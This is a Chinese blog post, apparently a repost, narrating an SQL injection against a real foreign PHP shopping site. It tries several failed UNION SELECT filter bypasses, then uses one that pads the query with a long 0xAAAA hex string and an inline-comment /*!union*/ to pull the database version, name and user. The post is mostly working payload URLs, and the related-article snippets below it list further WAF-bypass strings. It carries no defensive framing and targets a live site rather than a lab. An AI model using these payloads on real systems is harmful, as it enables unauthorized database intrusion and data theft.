变态方法突破过滤UNION+SELECT继续注入

最新推荐文章于 2024-10-09 11:11:45 发布
最新推荐文章于 2024-10-09 11:11:45 发布
阅读量1.1w 收藏 15
点赞数 4
分类专栏: 安全

http://www.jb51.net/article/48933.htm


  前几今天遇到一个bt 的老外注射点:

    //*ps 此点目前流行的注射工具射不 *//

    http:// /index.php?content=more_product&id=17

    http:// /index.php?content=more_product&id=17 and 1=1 正常

    http:// /index.php?content=more_product&id=17 and 1=2 报错

    http:// /index.php?content=more_product&id=17 order by 6 正常

    http:// /index.php?content=more_product&id=17 order by 7 错误

    继续按照常规的手法注射:

    http:// /index.php?content=more_product&id=-17+UNION+SELECT+1,2,

    3,4,5,6--

    错误nnd,过滤 UNION+SELECT 我们来加点特殊的字符看看能不能绕过

    http:// /index.php?content=more_product&id=-17+/**//**//*!uNiOn*//**/

    /**//*!sElEcT*//**//**/1,2,3,4,5,6--

    悲剧还是绕不过去 - -,于是尝试自己知道的绕过方法继续射…

    http:// /index.php?content=more_product&id=-17+/*U*//*n*//*i*//*o*//*n

    *//*t*/+/*s*//*e*//*l*//*e*//*c*//*t*/+1,2,3,4,5,6--

    http:// /index.php?content=more_product&id=-17+concat(u,n,i,o,n)+conca

    t(s,e,l,e,c,t)+all+1,2,3,4,5,6--

    悲剧还是绕不过去,nnd。找了几个朋友看了还是绕不过去邪恶的过滤啊。要是国内

    的站以上几种方法一般都能搞定,老外就是bt。最后实在木有办法了只好去国外的黑

    客论坛求助老外帮助。国外php 注射历史悠久手法独特+方法猥琐 射出几率相当高

    于是发帖求助了终于有一个黑客回帖了而且轻松的绕过去了。

    http:// /index.php?content=more_product&id=-17  and  (select  1)=(select

    0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAA)+/*!union*/+select+1,2,3,4,5,6--+-

    靠,老外果然牛B 那么继续射

    http:// /index.php?content=more_product&id=-17  and  (select  1)=(select

    0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    AAAAAAAAAAAAAAAA)+/*!union*/+select+1,concat_ws(0x7c,version(),database(),u

    ser()),3,4,5,6--+-

    成功得到系统版本、当前数据库用户、用户名


ncafei
关注
专栏目录
23-5 绕过去除 unionselect 的 SQL 注入
weixin_43263566的博客
02-07 1005
在MySQL中,默认情况下,数据库名、表名在Unix、Linux系统上是区分大小写的,而在Windows系统上则不区分大小写。但是,SQL语句中的关键字(如SELECT、INSERT)、函数名(如MAX()、COUNT())以及列名和别名通常是不区分大小写的。但是,对于字符串值的比较,默认是区分大小写的。下面,我将简要介绍一些MySQL的基础知识,以及您提到的一些特殊编码和替换技巧。在某些安全性较低的应用场景中,攻击者可能会尝试通过改变查询语句的格式来绕过安全过滤器,执行SQL注入等恶意操作。
sql注入中的union select 1,2,3....
内心不种满鲜花就会长满杂草
03-15 2万+
在sql注入联合查询中,我们会碰到union select 1,2,3。那这个是什么意思了,首先先看下union select union select 用来合并两个或多个 SELECT 语句的结果集。比如这里新建了两个表,users和users2 users表如下 users2如下 联合查询,即查询users表中的name字段的值和查询users2表中的address字段的值,将结果一起返回 注意:union select只能查询两个表中共同都有的字段,如果一个字...
SQL手工注入绕过过滤
dielongxun4628的博客
08-27 343
1、考虑闭合:单引号 --> %27 空格-->%20 井号--> %23 ; 构造闭合函数 %27teacher%23 2、判断过滤内容:union --> uniunionon ; 联合查询过滤,再un后再加union ; 3、判断列数,使用Union 语法,union 后边语句要与前边已经执行的语句列数相同。 %27/**/ununionion...
SQL 注入漏洞详解 - Union 注入
weixin_36813011的博客
09-14 185
1)漏洞简介 SQL 注入简介 SQL 注入 即是指 Web 应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在 Web 应用程序中事先定义好的查询语句的结尾上添加额外的 SQL 语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。 SQL 注入概念 **SQL 注入漏洞 **主要形成的原因是在数据交互中,站点针对前...
sql注入杂谈(一)--union select
weixin_43570648的博客
03-19 1501
我就简单说说我对于联合注入的想法,以及对于联合注入绕过防火墙的方法,(只是我自己目前所掌握的方法,当然更多奇淫技巧还的需要我们自己去发掘)对于我们才学习安全的人来说,对于练习sql注入,我们学习最简单的语法就是sql注入之联合注入。 就拿sqli-labs来说说吧127.0.0.1/less-1/?id=1 我们的教程里面就说127.0.0.1/less-1/?id=1’ 加上单引号,看爆不爆错,...
sqli-labs:less-28(过滤unionselect
羽的博客
09-15 292
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; cha...
sql注入绕过union select
weixin_30332241的博客
08-11 188
# # # #WAF Bypassing Strings: /*!%55NiOn*/ /*!%53eLEct*/ %55nion(%53elect 1,2,3)-- - +union+distinct+select+ +union+distinctROW+select+ /**//*!12345UNION SELECT*//**/ ...
CTF-Web3-(SQL简单过滤绕过)
→_→
07-24 1695
3.简单的sql注入 思路: 检测是否存在注入点的两种常用方法:(更多注入详情:Sqli-labs环境通关教程-学习) 1.基于报错的检测方法 一般这种方法是输入单引号’。看是否报错,如果数据库报错,说明后台数据库处理了我们输入的数据。那么有可能存在注 入点。 2.基于布尔的检测方法---(这只是最基础的判断) 这种方法是输入: 1 and 1=1 ,通常这种情况会正常返回数据 1 and 1=2 ,通常这种情况不会返回数据或者直接报错 或者 1' and '1'='1 ,通常这种.
绕过UNION&SELECT过滤
ChuMeng1999的博客
10-30 530
打开桌面上的火狐浏览器,选择『绕过UNION&SELECT过滤』下面的『GET-基于错误-过滤UNION&SELECT-字符型-单引号和圆括号』。打开桌面上的火狐浏览器,选择『绕过UNION&SELECT过滤』下面的『GET-基于错误-过滤UNION&SELECT-字符型-单引号』。打开桌面上的火狐浏览器,选择『绕过UNION&SELECT过滤』下面的『GET-基于错误-过滤UNION&SELECT-双引号』。很多不可见的空白字符都可以用哦,你可以试试。针对于过滤,我们要善用编码,来绕过关键字过滤
sql注入过滤select_SQL注入高级进阶-堆叠注入
weixin_39808803的博客
11-21 1372
原理0x00 堆叠注入定义 Stacked injections(堆叠注入)从名词的含义就可以看到应该是一堆 sql 语句(多条)一起执行。而在真实的运用中也是这样的, 我们知道在 mysql 中, 主要是命令行中, 每一条语句结尾加; 表示语句结束。这样我们就想到了是不是可以多句一起使用。这个叫做 stacked injection。0x01 堆叠注入原理 在SQL中,分号(;)是用来表示一条s...
2021-09-01 网安实验-SQL注入-绕过UNION&SELECT过滤
热门推荐
时光隧道
09-01 4万+
关键代码为: 在MySQL中tab,空格,回车都可以隔断语句,那么我们就可以用使用/**/ 或() 或+ 代替空格,%0c =换页、%09 = 水平制表符、%0d = 回车、%0a = 换行。那我们试试 『id=12211%27+uniOn%09selEct%0d1,2,password%0dfrom%0dusers%0dwhere%0did=%272%27||%27』 成功了呢。很多不可见的空白字符都可以用哦,你可以试试。 ...
【SQL注入-03】union联合查询注入案例
m0_64378913的博客
04-25 3669
目录1 union联合查询注入概述1.1 简介1.2 适用条件1.3 注入步骤1.4 注入技巧2 union联合查询注入案例2.1 操作环境2.2 操作具体步骤2.2.1 判断是否存在注入点及注入的类型2.2.2 使用ORDER BY 查询回显列数。2.2.3 判断显示位置2.2.4 获取数据库名2.2.5 获取数据库中的所有表名2.2.6 获取数据库的对应表中的所有字段名2.2.7 获取字段中的数据3 总结 本博客内容仅供学习探讨,请勿滥用乱用 1 union联合查询注入概述 1.1 简介 union
Mysql组合查询-UNION-多个SELECT语句作为单个查询结果返回
刘春明的博客
08-11 1万+
有两种基本情况需要使用组合查询: 1、在单个查询中从不同的表返回结构类似的数据; 2、对单个表执行多个查询,按单个查询返回数据。 使用UNION 创建组合查询很简单,所需要做的只是给出每条SELECT语句,然后在各SELECT语句中间放上UNION。 举例:需要查询价格小于等于5的所有物品的一个列表,而且还想包括供应商1001和1002生产的所有物品(不考虑价格)。当然,可以利用WHER
SQL 自学:利用 UNION 操作符组合 SELECT 语句结果集
最新发布
Nervousr的博客
10-09 505
在 SQL 中,UNION操作符是一个非常强大的工具,它允许我们将多条SELECT语句的结果组合成一个单一的结果集。这在很多实际应用场景中都非常有用,比如整合来自不同表但具有相似结构的数据,或者从同一个表中按照不同条件查询数据并将结果合并。
SQL注入绕过关键词过滤的小技巧及原理(union select为例)
weixin_54848371的博客
09-22 1万+
本文以联合查询关键字union select为例讲解绕过关键词过滤的一些方法。之所以了解绕过,关键是发现sqlmap有时候真的是不靠谱,只能指定命令跑。有一些简单过滤很容易绕过却不能检测。虽然麻烦点,手工yyds~~。 1、大小写变种 UNION SELECT=>uNIon SElecT 选择几个字母变换大小写,可以绕过部分不太聪明的过滤器。在sql查询中是不区分大小写的所以查询语句正常执行 2、使用SQL注释 union select=>/**/UNION/**/...
[php审计实战篇]BlueCms v1.6 Union注入
dfdhxb995397的博客
12-11 145
非常基础的代码审计练习,适合有php基础的审计新手练习 本文作者:Aedoo 来源:i春秋社区 0×01 代码跟踪 首先,进入首页代码 :index.php 包含了php文件:/include/common.inc.php 跟踪这个php文件,这些文件都是包含的全局文件。 这个php文件还是先包含了几个全局文件。 最主要的是上图最下方的if判断: ...
如何利用 SQL UNION 操作符将多条 SELECT 语句组合成一个结果集
Vin_c° 的专栏
05-18 2694
文章目录一、组合查询二、创建组合查询2.1 使用 UNION2.2 UNION 规则2.3 包含或取消重复的行2.4 对组合查询结果排序三、小结 本文介绍如何利用 SQL UNION 操作符将多条 SELECT 语句组合成一个结果集。使用 UNION 可极大地简化复杂的 WHERE 子句,简化从多个表中检索数据的工作。 一、组合查询 多数 SQL 查询只包含从一个或多个表中返回数据的单条 SELECT 语句。但是,SQL 也允许执行多个查询(多条 SELECT 语句),并将结果作为一个查询结果集返回。 这些
【安全】P 2-18 绕过剔除黑名单(unionselect)的SQL注入
Z_David_Z的博客
02-15 676
目录0X01 基础知识介绍0X02 去除(union)的代码分析0X03 绕过去除(union)的sql的注入0X04 sqlmap安全检测 0X01 基础知识介绍 1、Mysql中的大小写不敏感,大写与小写一样。 2、Mysql 中的十六进制与URL编码通过解码识别。 3、符号和关键字替换 and – &&、or – ||。 4、空格使用 %20表示、%0a换行 %09 tab 0X02 去除(union)的代码分析 preg_replace(mixed $pattern , mixed
过滤union,table,information和各种库名时查询列名
qq_31028197的博客
05-18 366
过滤了information, innodb_index_stats,union等的条件下查询列名
sql注入过滤select
07-28
在SQL注入中,过滤select关键字是常见的安全措施之一。然而,有一些方法可以绕过这种过滤。一种方法是在过滤过滤的关键词前面加上URL编码的空字节%00。这是因为在C/C++中,空字节代表语句的结束,而SQL语句对空字节的解释则不同,它会继续执行后面的代码。因此,通过在select关键字前面加上%00,可以绕过过滤器的select关键字过滤\[2\]。 另外,还有一些其他的绕过方法可以用于绕过select关键字的过滤。例如,可以使用联合查询来绕过过滤器。通过在注入点处构造一个合法的联合查询语句,可以绕过select关键字的过滤,并执行自定义的SQL语句。例如,可以使用以下语句来绕过select关键字的过滤,并执行查询操作: ?id=-1' union select 1,group_concat(schema_name),3 from information_schema.schemata --+ 这个语句使用了联合查询来获取数据库中的所有模式名称,并将结果以逗号分隔的形式返回\[3\]。 总结起来,绕过select关键字的过滤可以使用URL编码的空字节%00或者联合查询等方法。然而,需要注意的是,进行SQL注入攻击是非法的行为,应该遵守法律法规,不进行未经授权的测试或攻击。 #### 引用[.reference_title] - *1* *2* [SQL注入绕过关键词过滤的小技巧及原理(union select为例)](https://blog.csdn.net/weixin_54848371/article/details/120423529)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [sql注入原理](https://blog.csdn.net/xg_ren/article/details/79354364)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值